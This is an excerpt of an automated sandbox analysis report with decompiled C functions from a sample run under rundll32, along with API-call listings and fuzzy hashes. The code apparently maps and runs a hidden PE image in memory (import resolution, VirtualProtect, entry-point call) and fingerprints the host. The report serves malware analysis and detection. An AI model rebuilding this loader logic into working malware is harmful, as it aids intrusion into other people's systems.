                                          				void* _t26;
                                          				void* _t31;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr _t43;
                                          				void* _t44;
                                          
                                          				_t37 = __edx;
                                          				_t33 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t43 =  *0x408d2a4; // 0xbfa5a8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0x408d238);
                                          				_t1 = _t43 + 0x408e791; // 0x6976612e
                                          				_t44 = _t1;
                                          				if( *0x408d24c >= 5) {
                                          					if(RtlAllocateHeap() == 0) {
                                          						L6:
                                          						_t31 = 8;
                                          						L7:
                                          						if(_t31 != 0) {
                                          							L10:
                                          							 *0x408d24c =  *0x408d24c + 1;
                                          							L11:
                                          							return _t31;
                                          						}
                                          						_t46 = _a4;
                                          						_t41 = _v8;
                                          						 *_a16 = _a4;
                                          						 *_a20 = E04087CF7(_a4, _t41); // executed
                                          						_t19 = E040860CF(_t41, _t41, _t46); // executed
                                          						if(_t19 != 0) {
                                          							 *_a8 = _t41;
                                          							 *_a12 = _t19;
                                          							if( *0x408d24c < 5) {
                                          								 *0x408d24c =  *0x408d24c & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t31 = 0xbf;
                                          						E04086106();
                                          						RtlFreeHeap( *0x408d238, 0, _t41); // executed
                                          						goto L10;
                                          					}
                                          					_t25 = E0408514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                          					L5:
                                          					_t31 = _t25;
                                          					goto L7;
                                          				}
                                          				_t26 = RtlAllocateHeap(); // executed
                                          				if(_t26 == 0) {
                                          					goto L6;
                                          				}
                                          				_t25 = E04081754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                          				goto L5;
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04089F3B
                                            • Part of subcall function 04081754: GetTickCount.KERNEL32 ref: 04081768
                                            • Part of subcall function 04081754: wsprintfA.USER32 ref: 040817B8
                                            • Part of subcall function 04081754: wsprintfA.USER32 ref: 040817D5
                                            • Part of subcall function 04081754: wsprintfA.USER32 ref: 04081801
                                            • Part of subcall function 04081754: HeapFree.KERNEL32(00000000,?), ref: 04081813
                                            • Part of subcall function 04081754: wsprintfA.USER32 ref: 04081834
                                            • Part of subcall function 04081754: HeapFree.KERNEL32(00000000,?), ref: 04081844
                                            • Part of subcall function 04081754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04081872
                                            • Part of subcall function 04081754: GetTickCount.KERNEL32 ref: 04081883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04089F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,04089C62,00000002,?,?,?,?), ref: 04089FB6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: b8d28eb16aa39f4feab72cfee4e3e89ac4f1fd731450cc5b8851a994b838d264
                                          • Instruction ID: 9e124bae2c6a1cef2fa99bdb569fd25a8c87218419c1e33cc35ddb91bbc634a6
                                          • Opcode Fuzzy Hash: b8d28eb16aa39f4feab72cfee4e3e89ac4f1fd731450cc5b8851a994b838d264
                                          • Instruction Fuzzy Hash: 0B214CB1200214ABEB15BF54DA40AEA37ADEF54348F10412DF982B7242D778FD45ABA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00511EB4(void* __eax, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				long _v16;
                                          				signed int _v20;
                                          				signed int _t31;
                                          				long _t33;
                                          				int _t34;
                                          				signed int _t35;
                                          				signed int _t42;
                                          				void* _t50;
                                          				void* _t51;
                                          				signed int _t54;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t42 =  *(__eax + 6) & 0x0000ffff;
                                          				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                          				_v20 = _t42;
                                          				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                          				_v8 = _v8 & 0x00000000;
                                          				if(_t42 <= 0) {
                                          					L11:
                                          					return _v12;
                                          				}
                                          				_t51 = _t50 + 0x24;
                                          				while(1) {
                                          					_t54 = _v12;
                                          					if(_t54 != 0) {
                                          						goto L11;
                                          					}
                                          					asm("bt dword [esi], 0x1d");
                                          					if(_t54 >= 0) {
                                          						asm("bt dword [esi], 0x1e");
                                          						if(__eflags >= 0) {
                                          							_t33 = 4;
                                          						} else {
                                          							asm("bt dword [esi], 0x1f");
                                          							_t35 = 0;
                                          							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
                                          						}
                                          					} else {
                                          						asm("bt dword [esi], 0x1f");
                                          						asm("sbb eax, eax");
                                          						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
                                          					}
                                          					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
                                          					if(_t34 == 0) {
                                          						_v12 = GetLastError();
                                          					}
                                          					_t51 = _t51 + 0x28;
                                          					_v8 = _v8 + 1;
                                          					_t31 = _v8;
                                          					if(_t31 < _v20) {
                                          						continue;
                                          					} else {
                                          						goto L11;
                                          					}
                                          				}
                                          				goto L11;
                                          			}

                                          APIs
                                          • VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00511EE2
                                          • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00511F3A
                                          • GetLastError.KERNEL32 ref: 00511F40
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLast
                                          • String ID:
                                          • API String ID: 1469625949-0
                                          • Opcode ID: 269984346cb4c95398f85ee7b22deb46f1b6352e8f69e1acb9c9c5eb73316921
                                          • Instruction ID: 3431d31bfaf6fe3b33efd5eea93029ec0c1781df58473db4626e279ad23d08d1
                                          • Opcode Fuzzy Hash: 269984346cb4c95398f85ee7b22deb46f1b6352e8f69e1acb9c9c5eb73316921
                                          • Instruction Fuzzy Hash: E521AE72900209EFEB208F94CC80EEDBBB4FF14314F204599E6409B142E3749AC9DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E005116E4() {
                                          				char _v16;
                                          				intOrPtr _v28;
                                          				void _v32;
                                          				void* _v36;
                                          				intOrPtr _t15;
                                          				void* _t16;
                                          				long _t25;
                                          				int _t26;
                                          				intOrPtr _t30;
                                          				void* _t32;
                                          				signed int _t35;
                                          				intOrPtr* _t37;
                                          				intOrPtr _t39;
                                          				int _t44;
                                          
                                          				_t15 =  *0x514144;
                                          				if( *0x51412c > 5) {
                                          					_t16 = _t15 + 0x5150f4;
                                          				} else {
                                          					_t16 = _t15 + 0x5150b1;
                                          				}
                                          				E00511000(_t16, _t16);
                                          				_t35 = 6;
                                          				memset( &_v32, 0, _t35 << 2);
                                          				if(E00511D86( &_v32,  &_v16,  *0x514140 ^ 0xc786104c) == 0) {
                                          					_t25 = 0xb;
                                          				} else {
                                          					_t26 = lstrlenW( *0x514138);
                                          					_t8 = _t26 + 2; // 0x2
                                          					_t44 = _t26 + _t8;
                                          					_t11 = _t44 + 8; // 0xa
                                          					_t30 = E005110FC(_t39, _t11,  &_v32,  &_v36); // executed
                                          					if(_t30 == 0) {
                                          						_t37 = _v36;
                                          						 *_t37 = _t30;
                                          						_t32 =  *0x514138;
                                          						if(_t32 == 0) {
                                          							 *(_t37 + 4) = 0;
                                          						} else {
                                          							memcpy(_t37 + 4, _t32, _t44);
                                          						}
                                          					}
                                          					_t25 = E00511ADC(_v28); // executed
                                          				}
                                          				ExitThread(_t25);
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExitThreadlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3726537860-0
                                          • Opcode ID: 3ce641a766e71222294d2e1f4f7fd5f499a02f08f2433dbe710729f02f02b452
                                          • Instruction ID: 26e8fd74a2005c6dedd04515dc4c7928814f73ad490850746a87f23ba826c768
                                          • Opcode Fuzzy Hash: 3ce641a766e71222294d2e1f4f7fd5f499a02f08f2433dbe710729f02f02b452
                                          • Instruction Fuzzy Hash: 5C11EE71404A06ABE710DB70CC8CED77BECFB58350F0448A9F605D32A1EB20E588CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E0408642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				void* _v8;
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				_t40 = E04084FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                          						_t52 = _v8;
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0x408d2a4; // 0xbfa5a8
                                          						_t20 = _t68 + 0x408e1fc; // 0x740053
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E04085103(_a4);
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                          									_t50 = _a4;
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                          						}
                                          						_t57 = __imp__#6;
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                          				goto L18;
                                          			}

                                          APIs
                                            • Part of subcall function 04084FFA: SysAllocString.OLEAUT32(80000002), ref: 04085057
                                            • Part of subcall function 04084FFA: SysFreeString.OLEAUT32(00000000), ref: 040850BD
                                          • SysFreeString.OLEAUT32(?), ref: 0408650B
                                          • SysFreeString.OLEAUT32(0408A6F4), ref: 04086515
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 984d78407625fed571aceb5e3eaecc0265a73baf1fbb513c9195c2d152e5a02d
                                          • Instruction ID: 77e07ab747befb2589645d667d15267f5bb89d4bade21a587b5d1c88b7bf7271
                                          • Opcode Fuzzy Hash: 984d78407625fed571aceb5e3eaecc0265a73baf1fbb513c9195c2d152e5a02d
                                          • Instruction Fuzzy Hash: 84317A71500159AFCB21EF68C988C9FBBB9FFC9744B114A5CF845AB214E632ED41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E040873E9(void* __ecx) {
                                          				signed int _v8;
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E040858BE(_t10 + 1);
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;
                                          						} else {
                                          							E0408147E(_t20);
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,040851DC,7519F710,00000000,?,?,040851DC), ref: 04087401
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,040851DC,040851DD,?,?,040851DC), ref: 0408741E
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 01d7ddeec2a4fc71cc1d6163a59976ebcce5d3062313329299047f0236084ef7
                                          • Instruction ID: b515cd3fc168b15f959e0d673200e26486bfec14ca666119c9c12c296db32f54
                                          • Opcode Fuzzy Hash: 01d7ddeec2a4fc71cc1d6163a59976ebcce5d3062313329299047f0236084ef7
                                          • Instruction Fuzzy Hash: 97F05436600149BAE711EAB98E00EAF7AFDDBC5654F21006DA944F7244EB74EF0196B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E04087BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0x408d2a4; // 0xbfa5a8
                                          				_t4 = _t15 + 0x408e39c; // 0x4c88944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0x408e124; // 0x650047
                                          				_t17 = E0408642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E04084CD3(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}

                                          APIs
                                            • Part of subcall function 0408642C: SysFreeString.OLEAUT32(?), ref: 0408650B
                                            • Part of subcall function 04084CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0408358E,004F0053,00000000,?), ref: 04084CDC
                                            • Part of subcall function 04084CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0408358E,004F0053,00000000,?), ref: 04084D06
                                            • Part of subcall function 04084CD3: memset.NTDLL ref: 04084D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04087C0C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 12ed0e1f21e4b64ff321b44d30082e5f150a08720c84ee819b25488ddb5009a9
                                          • Instruction ID: 81898e86b66274bd082cf6c9bbe22f4a5bd471afaf969778bc1a5e78b47538e8
                                          • Opcode Fuzzy Hash: 12ed0e1f21e4b64ff321b44d30082e5f150a08720c84ee819b25488ddb5009a9
                                          • Instruction Fuzzy Hash: B5019E3151001AFFEB51AFA4CE00AEEBBB8EB14244F00453DE985F7165E371E9528BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00511000(void* __eax, intOrPtr _a4) {
                                          
                                          				 *0x514150 =  *0x514150 & 0x00000000;
                                          				_push(0);
                                          				_push(0x51414c);
                                          				_push(1);
                                          				_push(_a4);
                                          				 *0x514148 = 0xc; // executed
                                          				L005111CE(); // executed
                                          				return __eax;
                                          			}

                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00511711,00000001,0051414C,00000000), ref: 0051101E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          • Opcode ID: 03c82075380533b34b56c1ef6a6e308d4138f97e90f7a8d045139fa746b52fe9
                                          • Instruction ID: f9c917d444a2f45f368869f42c98996069d647f28a4d48c3c811242e0d9c53c1
                                          • Opcode Fuzzy Hash: 03c82075380533b34b56c1ef6a6e308d4138f97e90f7a8d045139fa746b52fe9
                                          • Instruction Fuzzy Hash: 94C04CB42C0341B6F6209F409C4AFC57E917771B05F155504B610251D1D3F614D8DD19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E040858BE(long _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = RtlAllocateHeap( *0x408d238, 0, _a4); // executed
                                          				return _t2;
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: a6bd1546c16a7d7a62dc6b15b5ab8bd47546fbc9bc8cbc5bbfd3f48273ba19f2
                                          • Instruction ID: c1b14737d1c96374dab2794b71d8a9d55e9ad782c880eeef97940be51fbfe02b
                                          • Opcode Fuzzy Hash: a6bd1546c16a7d7a62dc6b15b5ab8bd47546fbc9bc8cbc5bbfd3f48273ba19f2
                                          • Instruction Fuzzy Hash: FAB01231004100EBEA014F00DF08F05BB31EF60700F018138B280241B0833D4C20EF26
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E00511ADC(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				void* _t17;
                                          				long _t25;
                                          				long _t28;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          				intOrPtr* _t35;
                                          				intOrPtr _t37;
                                          
                                          				_t34 = __eax;
                                          				_t17 = E00511F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                          				if(_t17 != 0) {
                                          					_t28 = 8;
                                          					goto L8;
                                          				} else {
                                          					_t33 = _v8;
                                          					_t28 = E00511CE4( &_v8, _t33, _t34);
                                          					if(_t28 == 0) {
                                          						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                          						_t28 = E005115C2(_t33, _t37);
                                          						if(_t28 == 0) {
                                          							_t25 = E00511EB4(_t37, _t33); // executed
                                          							_t28 = _t25;
                                          							if(_t28 == 0) {
                                          								_push(_t25);
                                          								_push(1);
                                          								_push(_t33);
                                          								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
                                          									_t28 = GetLastError();
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_t35 = _v12;
                                          					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
                                          					E00511938(_t35);
                                          					L8:
                                          					return _t28;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 00511F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00511B06,?,?,?,?,00000002,?,0051178F), ref: 00511F86
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00511FA8
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00511FBE
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00511FD4
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00511FEA
                                            • Part of subcall function 00511F61: GetProcAddress.KERNEL32(00000000,?), ref: 00512000
                                            • Part of subcall function 00511CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,00511B14,?,?,?,?,?,?,00000002), ref: 00511D1B
                                            • Part of subcall function 00511CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00511D50
                                            • Part of subcall function 005115C2: LoadLibraryA.KERNEL32 ref: 005115F8
                                            • Part of subcall function 005115C2: lstrlenA.KERNEL32 ref: 0051160E
                                            • Part of subcall function 005115C2: memset.NTDLL ref: 00511618
                                            • Part of subcall function 005115C2: GetProcAddress.KERNEL32(?,00000002), ref: 0051167B
                                            • Part of subcall function 005115C2: lstrlenA.KERNEL32(-00000002), ref: 00511690
                                            • Part of subcall function 005115C2: memset.NTDLL ref: 0051169A
                                            • Part of subcall function 00511EB4: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00511EE2
                                            • Part of subcall function 00511EB4: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00511F3A
                                            • Part of subcall function 00511EB4: GetLastError.KERNEL32 ref: 00511F40
                                          • GetLastError.KERNEL32(?,0051178F), ref: 00511B49
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 33504255-0
                                          • Opcode ID: 63163109e4fe9a452f52341f1322cedb5d59beaeaf52e01ea338e20df6242019
                                          • Instruction ID: 3a5e7b14f9d18fe1125283dc55c9f72e666bbbbb5e0287c97bdda9a63fd8a9a8
                                          • Opcode Fuzzy Hash: 63163109e4fe9a452f52341f1322cedb5d59beaeaf52e01ea338e20df6242019
                                          • Instruction Fuzzy Hash: CD11AC72600B116BE7216BE58C89DEB7FACBF54754B0001A4FB05D7241FB60ED45C7A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E04089347(void* __ecx, signed char* _a4) {
                                          				void* _v8;
                                          				void* _t8;
                                          				signed short _t11;
                                          				signed int _t12;
                                          				signed int _t14;
                                          				intOrPtr _t15;
                                          				void* _t19;
                                          				signed short* _t22;
                                          				void* _t24;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = 0;
                                          				_push(0);
                                          				_t19 = 1;
                                          				_t27 = 0x408d330;
                                          				E0408684E();
                                          				while(1) {
                                          					_t8 = E040832BA(_a4,  &_v8); // executed
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_push(_v8);
                                          					_t14 = 0xd;
                                          					_t15 = E0408A5E9(_t14);
                                          					if(_t15 == 0) {
                                          						HeapFree( *0x408d238, 0, _v8);
                                          						break;
                                          					} else {
                                          						 *_t27 = _t15;
                                          						_t27 = _t27 + 4;
                                          						_t24 = _t24 + 1;
                                          						if(_t24 < 3) {
                                          							continue;
                                          						} else {
                                          						}
                                          					}
                                          					L7:
                                          					_push(1);
                                          					E0408684E();
                                          					if(_t19 != 0) {
                                          						_t22 =  *0x408d338; // 0x4c89b58
                                          						_t11 =  *_t22 & 0x0000ffff;
                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                          							_t12 = _t11 & 0x0000ffff;
                                          						} else {
                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                          						}
                                          						 *_t22 = _t12;
                                          					}
                                          					return _t19;
                                          				}
                                          				_t19 = 0;
                                          				goto L7;
                                          			}














                                          APIs
                                            • Part of subcall function 0408684E: GetProcAddress.KERNEL32(36776F57,0408935F), ref: 04086869
                                            • Part of subcall function 040832BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 040832E5
                                            • Part of subcall function 040832BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04083307
                                            • Part of subcall function 040832BA: memset.NTDLL ref: 04083321
                                            • Part of subcall function 040832BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0408335F
                                            • Part of subcall function 040832BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04083373
                                            • Part of subcall function 040832BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 0408338A
                                            • Part of subcall function 040832BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04083396
                                            • Part of subcall function 040832BA: lstrcat.KERNEL32(?,642E2A5C), ref: 040833D7
                                            • Part of subcall function 040832BA: FindFirstFileA.KERNEL32(?,?), ref: 040833ED
                                            • Part of subcall function 0408A5E9: lstrlen.KERNEL32(?,00000000,0408D330,00000001,0408937A,0408D00C,0408D00C,00000000,00000005,00000000,00000000,?,?,?,0408207E,?), ref: 0408A5F2
                                            • Part of subcall function 0408A5E9: mbstowcs.NTDLL ref: 0408A619
                                            • Part of subcall function 0408A5E9: memset.NTDLL ref: 0408A62B
